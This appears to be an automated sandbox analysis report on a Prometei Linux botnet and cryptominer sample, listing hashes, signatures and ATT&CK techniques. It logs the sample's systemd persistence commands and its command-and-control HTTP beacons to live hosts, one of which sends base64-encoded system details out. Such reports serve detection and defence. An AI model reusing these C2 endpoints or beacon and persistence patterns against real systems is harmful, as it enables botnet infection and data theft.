prometei_elf | a42d53bc7de5cfebce2878c4dd636a37943289883688f57365b539941d6825fe

Analysis

max time kernel
6s
max time network
145s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20250307-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20250307-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
03/04/2025, 21:18 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.elf
Size

425KB
MD5

84c46f0bb4ac98fe32245989300d2327
SHA1

5943ae77e0c6d1e389db929fd3412baf9c2fd474
SHA256

a42d53bc7de5cfebce2878c4dd636a37943289883688f57365b539941d6825fe
SHA512

ae24e44c974511afd3426f9fd12d7e187234e79b2893306a9ff77d1fe5c5b342ad0583f28cb73cfa59b58fa09a37dcca21c6472dc1578cf094e7cce74f5b2601
SSDEEP

6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgz:25WOSACZSV6eKRH5EPiamb4DsDwwcD

Score

10^/10

prometei_elf botnet discovery miner persistence privilege_escalation upx

Malware Config

Signatures

Prometei
Prometei is a multiplatform botnet used to mine cryptocurrency.
botnet miner prometei_elf
Prometei_elf family
prometei_elf

Deletes itself 1 IoCs

pid	Process
1557	na.elf

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
File opened for modification	/etc/hosts	na.elf

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence privilege_escalation

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/lib/systemd/system/uplugplay.service	na.elf

Write file to user bin folder 1 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/sbin/uplugplay	na.elf

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx

Reads CPU attributes 1 TTPs 3 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/212/status	pgrep
File opened for reading	/proc/777/status	pgrep
File opened for reading	/proc/112/stat	pidof
File opened for reading	/proc/80/status	pgrep
File opened for reading	/proc/631/status	pgrep
File opened for reading	/proc/1232/cmdline	pidof
File opened for reading	/proc/584/cmdline	pgrep
File opened for reading	/proc/1551/cmdline	pgrep
File opened for reading	/proc/88/stat	pidof
File opened for reading	/proc/1039/stat	pidof
File opened for reading	/proc/9/cmdline	pgrep
File opened for reading	/proc/410/status	pgrep
File opened for reading	/proc/885/cmdline	pgrep
File opened for reading	/proc/81/cmdline	pgrep
File opened for reading	/proc/582/stat	pidof
File opened for reading	/proc/952/stat	pidof
File opened for reading	/proc/589/status	pgrep
File opened for reading	/proc/768/status	pgrep
File opened for reading	/proc/74/cmdline	pgrep
File opened for reading	/proc/1554/cmdline	pgrep
File opened for reading	/proc/99/cmdline	pgrep
File opened for reading	/proc/219/status	pgrep
File opened for reading	/proc/221/cmdline	pgrep
File opened for reading	/proc/1166/status	pgrep
File opened for reading	/proc/1162/cmdline	pidof
File opened for reading	/proc/582/status	pgrep
File opened for reading	/proc/1231/cmdline	pidof
File opened for reading	/proc/1370/cmdline	pidof
File opened for reading	/proc/18/status	pgrep
File opened for reading	/proc/14/cmdline	pgrep
File opened for reading	/proc/4/status	pgrep
File opened for reading	/proc/7/cmdline	pgrep
File opened for reading	/proc/1080/cmdline	pidof
File opened for reading	/proc/80/cmdline	pidof
File opened for reading	/proc/582/cmdline	pgrep
File opened for reading	/proc/753/cmdline	pidof
File opened for reading	/proc/411/cmdline	pgrep
File opened for reading	/proc/629/cmdline	pidof
File opened for reading	/proc/753/stat	pidof
File opened for reading	/proc/927/status	pgrep
File opened for reading	/proc/1119/status	pgrep
File opened for reading	/proc/89/cmdline	pidof
File opened for reading	/proc/21/cmdline	pgrep
File opened for reading	/proc/85/stat	pidof
File opened for reading	/proc/85/cmdline	pidof
File opened for reading	/proc/75/status	pgrep
File opened for reading	/proc/sys/kernel/osrelease	pgrep
File opened for reading	/proc/413/status	pgrep
File opened for reading	/proc/928/status	pgrep
File opened for reading	/proc/726/stat	pidof
File opened for reading	/proc/259/cmdline	pgrep
File opened for reading	/proc/88/cmdline	pidof
File opened for reading	/proc/584/cmdline	pgrep
File opened for reading	/proc/218/cmdline	pgrep
File opened for reading	/proc/25/stat	pidof
File opened for reading	/proc/782/cmdline	pgrep
File opened for reading	/proc/1033/stat	pidof
File opened for reading	/proc/4/cmdline	pgrep
File opened for reading	/proc/75/stat	pidof
File opened for reading	/proc/753/stat	pidof
File opened for reading	/proc/1575/status	pgrep
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/211/cmdline	pgrep
File opened for reading	/proc/310/status	pgrep

/tmp/na.elf
/tmp/na.elf
1⤵
- Deletes itself
- Modifies hosts file
- Modifies systemd
- Write file to user bin folder
PID:1557
- /bin/sh
  sh -c "pgrep na.elf"
  2⤵
  PID:1560
- - /usr/bin/pgrep
    pgrep na.elf
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1561
- /bin/sh
  sh -c "pgrep uplugplay"
  2⤵
  PID:1564
- - /usr/bin/pgrep
    pgrep uplugplay
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1565
- /bin/sh
  sh -c "pidof uplugplay"
  2⤵
  PID:1571
- - /usr/bin/pidof
    pidof uplugplay
    3⤵
    - Reads runtime system information
    PID:1572
- /bin/sh
  sh -c "pgrep upnpsetup"
  2⤵
  PID:1575
- - /usr/bin/pgrep
    pgrep upnpsetup
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1576
- /bin/sh
  sh -c "pidof upnpsetup"
  2⤵
  PID:1585
- - /usr/bin/pidof
    pidof upnpsetup
    3⤵
    - Reads runtime system information
    PID:1586
- /bin/sh
  sh -c "systemctl daemon-reload"
  2⤵
  PID:1587
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    PID:1588
- /bin/sh
  sh -c "systemctl enable uplugplay.service"
  2⤵
  PID:1622
- - /usr/bin/systemctl
    systemctl enable uplugplay.service
    3⤵
    PID:1623
- /bin/sh
  sh -c "systemctl start uplugplay.service"
  2⤵
  PID:1659
- - /usr/bin/systemctl
    systemctl start uplugplay.service
    3⤵
    PID:1660

Network

GET

http://152.36.128.18/cgi-bin/p.cgi?r=100&i=I9WPTG57FTJV19SG

Remote address:

152.36.128.18:80

Request

GET /cgi-bin/p.cgi?r=100&i=I9WPTG57FTJV19SG HTTP/1.0
Host: 152.36.128.18

Response

HTTP/1.1 200 OK

Date: Thu, 03 Apr 2025 21:18:37 GMT
Server: Apache/2.4.41 (Win64)
Content-Length: 7
Connection: close
Content-Type: text/html; charset=windows-1251
GET

http://152.36.128.18/cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQp1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExDQoNCjF4IEFNRCBFUFlDIFByb2Nlc3Nvcg0KMjAxMTA2OCBrQg0KUUVNVQ0KU3RhbmRhcmQgUEMgX2k0NDBGWCArIFBJSVgsIDE5OTZfDQoNCg0KVWJ1bnR1IDIyLjA0LjQgTFRTICYgMjIuMDQuNCBMVFMgKEphbW15IEplbGx5ZmlzaCkgICYgYm9va3dvcm0vc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAyMToxODozNSB1cCAyIG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMC40NCwgMC4zOSwgMC4xN3wxNzQzNzE1MTE1DQpMaW51eCB1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExIDUuMTUuMC0xMDUtZ2VuZXJpYyAjMTE1LVVidW50dSBTTVAgTW9uIEFwciAxNSAwOTo1MjowNCBVVEMgMjAyNCB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=I9WPTG57FTJV19SG&h=ubuntu2204-amd64-20250307-en-11&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF++izV9fUCmjBxl+A7J/WzhQ/9UOQ+oyvVFS5OT1sGQ+1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte+LOb1BBkW4DqTltbWMNKlxWrA+RzY=

Remote address:

152.36.128.18:80

Request

GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQp1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExDQoNCjF4IEFNRCBFUFlDIFByb2Nlc3Nvcg0KMjAxMTA2OCBrQg0KUUVNVQ0KU3RhbmRhcmQgUEMgX2k0NDBGWCArIFBJSVgsIDE5OTZfDQoNCg0KVWJ1bnR1IDIyLjA0LjQgTFRTICYgMjIuMDQuNCBMVFMgKEphbW15IEplbGx5ZmlzaCkgICYgYm9va3dvcm0vc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAyMToxODozNSB1cCAyIG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMC40NCwgMC4zOSwgMC4xN3wxNzQzNzE1MTE1DQpMaW51eCB1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExIDUuMTUuMC0xMDUtZ2VuZXJpYyAjMTE1LVVidW50dSBTTVAgTW9uIEFwciAxNSAwOTo1MjowNCBVVEMgMjAyNCB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=I9WPTG57FTJV19SG&h=ubuntu2204-amd64-20250307-en-11&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF++izV9fUCmjBxl+A7J/WzhQ/9UOQ+oyvVFS5OT1sGQ+1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte+LOb1BBkW4DqTltbWMNKlxWrA+RzY= HTTP/1.0
Host: 152.36.128.18

Response

HTTP/1.1 200 OK

Date: Thu, 03 Apr 2025 21:18:37 GMT
Server: Apache/2.4.41 (Win64)
Content-Length: 3
Connection: close
Content-Type: text/html; charset=windows-1251
DNS

xinchaoadcfea.com

Remote address:

8.8.8.8:53

Request

xinchaoadcfea.com

IN A

Response
DNS

xinchaoadcfea.net

Remote address:

8.8.8.8:53

Request

xinchaoadcfea.net

IN A

Response

xinchaoadcfea.net

IN A

34.229.166.50
DNS

xinchaoadcfea.net

Remote address:

8.8.8.8:53

Request

xinchaoadcfea.net

IN A

Response

xinchaoadcfea.net

IN A

34.229.166.50
GET

http://xinchaoadcfea.net/cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_

Remote address:

34.229.166.50:80

Request

GET /cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_ HTTP/1.0
Host: xinchaoadcfea.net

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 03 Apr 2025 21:20:45 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=b4575d357454ed24063a57edbf5ee811|212.102.63.147|1743715245|1743715245|0|1|0; path=/; domain=.xinchaoadcfea.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xinadcfea.org

Remote address:

8.8.8.8:53

Request

xinadcfea.org

IN A

Response

xinadcfea.org

IN A

85.214.228.140
DNS

xinadcfea.org

Remote address:

8.8.8.8:53

Request

xinadcfea.org

IN A

Response

xinadcfea.org

IN A

85.214.228.140
GET

http://xinadcfea.org/cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_

Remote address:

85.214.228.140:80

Request

GET /cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_ HTTP/1.0
Host: xinadcfea.org

Response

HTTP/1.0 404 Not Found

Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Apr 2025 21:20:45 GMT
Content-Length: 19

152.36.128.18:80

http://152.36.128.18/cgi-bin/p.cgi?r=100&i=I9WPTG57FTJV19SG

http

337 B
391 B
6
5

HTTP Request

GET http://152.36.128.18/cgi-bin/p.cgi?r=100&i=I9WPTG57FTJV19SG

HTTP Response

200
152.36.128.18:80

http://152.36.128.18/cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQp1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExDQoNCjF4IEFNRCBFUFlDIFByb2Nlc3Nvcg0KMjAxMTA2OCBrQg0KUUVNVQ0KU3RhbmRhcmQgUEMgX2k0NDBGWCArIFBJSVgsIDE5OTZfDQoNCg0KVWJ1bnR1IDIyLjA0LjQgTFRTICYgMjIuMDQuNCBMVFMgKEphbW15IEplbGx5ZmlzaCkgICYgYm9va3dvcm0vc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAyMToxODozNSB1cCAyIG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMC40NCwgMC4zOSwgMC4xN3wxNzQzNzE1MTE1DQpMaW51eCB1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExIDUuMTUuMC0xMDUtZ2VuZXJpYyAjMTE1LVVidW50dSBTTVAgTW9uIEFwciAxNSAwOTo1MjowNCBVVEMgMjAyNCB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=I9WPTG57FTJV19SG&h=ubuntu2204-amd64-20250307-en-11&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF++izV9fUCmjBxl+A7J/WzhQ/9UOQ+oyvVFS5OT1sGQ+1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte+LOb1BBkW4DqTltbWMNKlxWrA+RzY=

http

1.1kB
436 B
6
5

HTTP Request

GET http://152.36.128.18/cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQp1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExDQoNCjF4IEFNRCBFUFlDIFByb2Nlc3Nvcg0KMjAxMTA2OCBrQg0KUUVNVQ0KU3RhbmRhcmQgUEMgX2k0NDBGWCArIFBJSVgsIDE5OTZfDQoNCg0KVWJ1bnR1IDIyLjA0LjQgTFRTICYgMjIuMDQuNCBMVFMgKEphbW15IEplbGx5ZmlzaCkgICYgYm9va3dvcm0vc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAyMToxODozNSB1cCAyIG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMC40NCwgMC4zOSwgMC4xN3wxNzQzNzE1MTE1DQpMaW51eCB1YnVudHUyMjA0LWFtZDY0LTIwMjUwMzA3LWVuLTExIDUuMTUuMC0xMDUtZ2VuZXJpYyAjMTE1LVVidW50dSBTTVAgTW9uIEFwciAxNSAwOTo1MjowNCBVVEMgMjAyNCB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=I9WPTG57FTJV19SG&h=ubuntu2204-amd64-20250307-en-11&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF++izV9fUCmjBxl+A7J/WzhQ/9UOQ+oyvVFS5OT1sGQ+1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte+LOb1BBkW4DqTltbWMNKlxWrA+RzY=

HTTP Response

200
34.229.166.50:80

http://xinchaoadcfea.net/cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_

http

657 B
656 B
7
5

HTTP Request

GET http://xinchaoadcfea.net/cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_

HTTP Response

200
85.214.228.140:80

http://xinadcfea.org/cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_

http

533 B
444 B
5
5

HTTP Request

GET http://xinadcfea.org/cgi-bin/p.cgi?r=0&auth=hash&i=I9WPTG57FTJV19SG&enckey=aOMhfScW/ZF3MJIM7dmhRmzfyAF--izV9fUCmjBxl-A7J/WzhQ/9UOQ-oyvVFS5OT1sGQ-1biz1HVWYSHpFbBhahpXx0TmbnTbHHqVRaww6/qUIz6Xe6lGlUWO7iMRLk6GEeEwm0sAWUte-LOb1BBkW4DqTltbWMNKlxWrA-RzY_

HTTP Response

404
172.16.3.2:80

240 B
4

224.0.0.251:5353

146 B
2
8.8.8.8:53

xinchaoadcfea.com

dns

63 B
136 B
1
1

DNS Request

xinchaoadcfea.com
8.8.8.8:53

xinchaoadcfea.net

dns

63 B
79 B
1
1

DNS Request

xinchaoadcfea.net

DNS Response

34.229.166.50
8.8.8.8:53

xinchaoadcfea.net

dns

63 B
79 B
1
1

DNS Request

xinchaoadcfea.net

DNS Response

34.229.166.50
8.8.8.8:53

xinadcfea.org

dns

59 B
75 B
1
1

DNS Request

xinadcfea.org

DNS Response

85.214.228.140
8.8.8.8:53

xinadcfea.org

dns

59 B
75 B
1
1

DNS Request

xinadcfea.org

DNS Response

85.214.228.140

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Privilege Escalation

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/usr/lib/systemd/system/uplugplay.service

Filesize
145B

MD5
8ca62d1f47880bce036c2956c9b7b272

SHA1
3bcc3a5c4fcc5b0d08c4524a59f6b8e113b62060

SHA256
c655d3d4e374fad38313ec4262207b2d7d68a870238f203ef3c33f85e66c8e32

SHA512
4cd2d9d67151fa25e833707dee2442c4a5f752053fc2c36ec73c0e2b734c66ca69c63fceb47714d9add5b9fe2eee1e45be5199e2cae7c26173e766b333877da6

Download Submit
/usr/sbin/uplugplay

Filesize
425KB

MD5
84c46f0bb4ac98fe32245989300d2327

SHA1
5943ae77e0c6d1e389db929fd3412baf9c2fd474

SHA256
a42d53bc7de5cfebce2878c4dd636a37943289883688f57365b539941d6825fe

SHA512
ae24e44c974511afd3426f9fd12d7e187234e79b2893306a9ff77d1fe5c5b342ad0583f28cb73cfa59b58fa09a37dcca21c6472dc1578cf094e7cce74f5b2601

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.